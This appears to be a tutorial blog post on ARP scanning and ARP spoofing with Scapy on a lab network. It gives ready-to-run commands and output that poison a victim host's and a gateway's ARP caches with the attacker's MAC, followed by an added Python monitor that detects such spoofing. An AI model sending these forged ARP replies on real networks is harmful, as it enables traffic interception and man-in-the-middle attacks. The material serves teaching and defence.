Interactive ARP Scanning and Attacks with Scapy
2018-03-17 10:58
1. LAN ARP scan:
1) Simple implementation (a fuller implementation would wrap this in a function that automatically determines the network segment of the local IP address, or loops over an explicit list of IP addresses):
>>> arp2=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,hwdst='00:00:00:00:00:00',pdst='192.168.80.0/24'))
Begin emission:
***Finished to send 256 packets.
................................................^C  (a fuller implementation would define when to stop)
Received 51 packets, got 3 answers, remaining 253 packets
>>> print(arp2[0].show())
0000 Ether / ARP who has 192.168.80.1 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:c0:00:08 says 192.168.80.1 / Padding
0001 Ether / ARP who has 192.168.80.2 says 192.168.80.250 ==> Ether / ARP is at 00:50:56:ef:49:1f says 192.168.80.2 / Padding
0002 Ether / ARP who has 192.168.80.251 says 192.168.80.250 ==> Ether / ARP is at 00:0c:29:21:fd:03 says 192.168.80.251 / Padding
2) Taking apart the fields of the packet from 192.168.80.251:
>>> print(arp2[0].res[2][1].fields)  # a fuller implementation would extract the fields automatically
{'src':'00:0c:29:21:fd:03', 'dst': '00:0c:29:e2:bb:15', 'type': 2054}
>>> print(arp2[0].res[2][1].show())  # a fuller implementation would extract the fields automatically
###[ Ethernet ]###
  dst= 00:0c:29:e2:bb:15
  src= 00:0c:29:21:fd:03
  type= 0x806
###[ ARP ]###
  hwtype= 0x1
  ptype= 0x800
  hwlen= 6
  plen= 4
  op= is-at
  hwsrc= 00:0c:29:21:fd:03
  psrc= 192.168.80.251
  hwdst= 00:0c:29:e2:bb:15
  pdst= 192.168.80.250
###[ Padding ]###
  load='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
None
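2. ARP spoofing (ARP poisoning)
1) Poison host 192.168.80.251 (tell it that the gateway's MAC is the attacker's MAC address):
192.168.80.1 has MAC address 00:50:56:c0:00:08 (gateway)
192.168.80.250 has MAC address 00:0c:29:e2:bb:15 (attacker)
192.168.80.251 has MAC address 00:0c:29:21:fd:03 (victim)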
>>> arp3=(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
>>> arp3.show()
###[ Ethernet ]###
  dst= 00:0c:29:21:fd:03
  src= '00:0c:29:e2:bb:15'
  type= 0x806
###[ ARP ]###
  hwtype= 0x1
  ptype= 0x800
  hwlen= 6
  plen= 4
  op= is-at
  hwsrc= 00:0c:29:e2:bb:15
  psrc= 192.168.80.1
  hwdst= 00:0c:29:21:fd:03
  pdst= 192.168.80.251
>>> arp3=srp(Ether(dst='00:0c:29:21:fd:03')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:0c:29:21:fd:03',psrc='192.168.80.1',pdst='192.168.80.251'))
Begin emission:
Finished to send 1 packets.
....^C
Received 4 packets, got 0 answers, remaining 1 packets
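Because ARP is a layer-2 packet, it can be sent as long as the destination MAC is correct. When 192.168.80.251 receives the ARP reply, it reads only hwsrc='00:0c:29:e2:bb:15' and psrc='192.168.80.1' from the ARP message and puts them into its own ARP cache.
Screenshots:
ARP cache on 192.168.80.251 before poisoning:
ARP cache on 192.168.80.251 after poisoning:
3) Poison the gateway (tell gateway 192.168.80.1 that the MAC address of host 192.168.80.251 is the attacker's MAC):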
>>> arp4=(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
>>> arp4.show()
###[ Ethernet ]###
  dst= 00:50:56:c0:00:08
  src= 00:0c:29:e2:bb:15
  type= 0x806
###[ ARP ]###
  hwtype= 0x1
  ptype= 0x800
  hwlen= 6
  plen= 4
  op= is-at
  hwsrc= 00:0c:29:e2:bb:15
  psrc= 192.168.80.251
  hwdst= 00:50:56:c0:00:08
  pdst= 192.168.80.1
>>> arp4=srp(Ether(dst='00:50:56:c0:00:08')/ARP(op=2,hwsrc='00:0c:29:e2:bb:15',hwdst='00:50:56:c0:00:08',psrc='192.168.80.251',pdst='192.168.80.1'))
Begin emission:
Finished to send 1 packets.
........^C
Received 8 packets, got 0 answers, remaining 1 packets
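Because ARP is a layer-2 packet, it can be sent as long as the destination MAC is correct. When 192.168.80.1 receives the ARP reply, it reads only hwsrc='00:0c:29:e2:bb:15' and psrc='192.168.80.251' from the ARP message and puts them into its own ARP cache.
Screenshots:
ARP cache on 192.168.80.1 before poisoning:
ARP cache on 192.168.80.1 after poisoning: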
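The cache update described above, where a host accepts hwsrc and psrc from any ARP reply, is what a monitor on the segment can watch for. The following is an added example, not code from the original post: a standard-library Python monitor that parses raw ARP frames and flags unsolicited replies and IP-to-MAC binding changes. The names `ArpMonitor`, `parse_arp`, `build_frame` and `run_sample`, and the sample frames, are constructed for illustration using the addresses listed on this page.

```python
import struct
from ipaddress import IPv4Address

GW, ATTACKER, VICTIM = "00:50:56:c0:00:08", "00:0c:29:e2:bb:15", "00:0c:29:21:fd:03"
GW_IP, VICTIM_IP = "192.168.80.1", "192.168.80.251"  # addresses from this page

def mac_bytes(s): return bytes.fromhex(s.replace(":", ""))
def mac_str(b): return ":".join(f"{x:02x}" for x in b)

def build_frame(eth_dst, eth_src, op, hwsrc, psrc, hwdst, pdst):
    """Raw Ethernet/ARP frame; used only to construct the sample input below."""
    hdr = mac_bytes(eth_dst) + mac_bytes(eth_src) + struct.pack("!HHHBBH", 0x0806, 1, 0x0800, 6, 4, op)
    return (hdr + mac_bytes(hwsrc) + IPv4Address(psrc).packed
            + mac_bytes(hwdst) + IPv4Address(pdst).packed)

def parse_arp(frame):
    """Return op/hwsrc/psrc/pdst, or None if not IPv4-over-Ethernet ARP."""
    if (len(frame) < 42 or frame[12:14] != b"\x08\x06"
            or struct.unpack("!HHBB", frame[14:20]) != (1, 0x0800, 6, 4)):
        return None
    return {"op": struct.unpack("!H", frame[20:22])[0], "hwsrc": mac_str(frame[22:28]),
            "psrc": str(IPv4Address(frame[28:32])), "pdst": str(IPv4Address(frame[38:42]))}

class ArpMonitor:
    def __init__(self):
        self.bindings = {}    # IP -> first MAC seen claiming it
        self.pending = set()  # (requester IP, requested IP) still awaiting a reply

    def observe(self, frame):
        a, alerts = parse_arp(frame), []
        if a is None:
            return alerts
        if a["op"] == 1:
            self.pending.add((a["psrc"], a["pdst"]))
        elif a["op"] == 2:
            if (a["pdst"], a["psrc"]) not in self.pending:
                alerts.append(f"unsolicited reply claiming {a['psrc']}")
            self.pending.discard((a["pdst"], a["psrc"]))
        known = self.bindings.setdefault(a["psrc"], a["hwsrc"])
        if known != a["hwsrc"]:
            alerts.append(f"{a['psrc']} changed from {known} to {a['hwsrc']}")
        return alerts

def run_sample():
    """Constructed capture: a genuine request/reply pair, then a reply with arp3's fields."""
    frames = [build_frame("ff:ff:ff:ff:ff:ff", VICTIM, 1, VICTIM, VICTIM_IP, "00:00:00:00:00:00", GW_IP),
              build_frame(VICTIM, GW, 2, GW, GW_IP, VICTIM, VICTIM_IP),
              build_frame(VICTIM, ATTACKER, 2, ATTACKER, GW_IP, VICTIM, VICTIM_IP)]
    mon = ArpMonitor()
    return [mon.observe(f) for f in frames]
```

Legitimate gratuitous ARP and address failover also produce unsolicited replies, so the binding change for a known IP, especially the gateway, is the stronger of the two signals.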